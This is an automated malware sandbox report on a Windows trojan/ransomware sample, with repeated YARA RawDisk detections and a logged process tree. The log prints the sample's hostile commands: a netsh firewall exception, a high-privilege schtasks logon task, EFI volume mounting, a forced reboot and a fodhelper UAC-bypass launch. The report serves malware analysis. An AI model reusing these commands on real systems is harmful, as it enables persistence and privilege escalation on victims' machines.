            Source: 17.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.3.1dyvctHqv1.exe.5ff40e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.3.1dyvctHqv1.exe.5e340e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.9a56e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.2.1dyvctHqv1.exe.9ad2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.1dyvctHqv1.exe.9a56e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.2.1dyvctHqv1.exe.574a8d0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.2.1dyvctHqv1.exe.5744f30.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.3.1dyvctHqv1.exe.5e3bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.1dyvctHqv1.exe.558a8d0.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.3.1dyvctHqv1.exe.5e39a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.1dyvctHqv1.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.3.1dyvctHqv1.exe.5ffbce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.3.csrss.exe.6559a80.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 17.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.1dyvctHqv1.exe.5584f30.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.2.1dyvctHqv1.exe.9ab080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.2.csrss.exe.9a56e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 52.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 33.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9a56e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 39.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 12.3.1dyvctHqv1.exe.5ff9a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile created: C:\Windows\rssJump to behavior
            Source: C:\Windows\rss\csrss.exeCode function: String function: 0042C330 appears 36 times
            Source: bootx64.efi.17.drStatic PE information: No import functions for PE file found
            Source: EfiGuardDxe.efi.17.drStatic PE information: No import functions for PE file found
            Source: bootmgfw.efi.17.drStatic PE information: No import functions for PE file found
            Source: 1dyvctHqv1.exeBinary or memory string: OriginalFilename vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exeBinary or memory string: OriginalFilename vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs 1dyvctHqv1.exe
            Source: 1dyvctHqv1.exeStatic PE information: invalid certificate
            Source: 1dyvctHqv1.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
            Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@78/18@12/5
            Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: 1dyvctHqv1.exeVirustotal: Detection: 19%
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile read: C:\Users\user\Desktop\1dyvctHqv1.exeJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\1dyvctHqv1.exe "C:\Users\user\Desktop\1dyvctHqv1.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Users\user\Desktop\1dyvctHqv1.exe C:\Users\user\Desktop\1dyvctHqv1.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /301-301
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: unknownProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: unknownProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
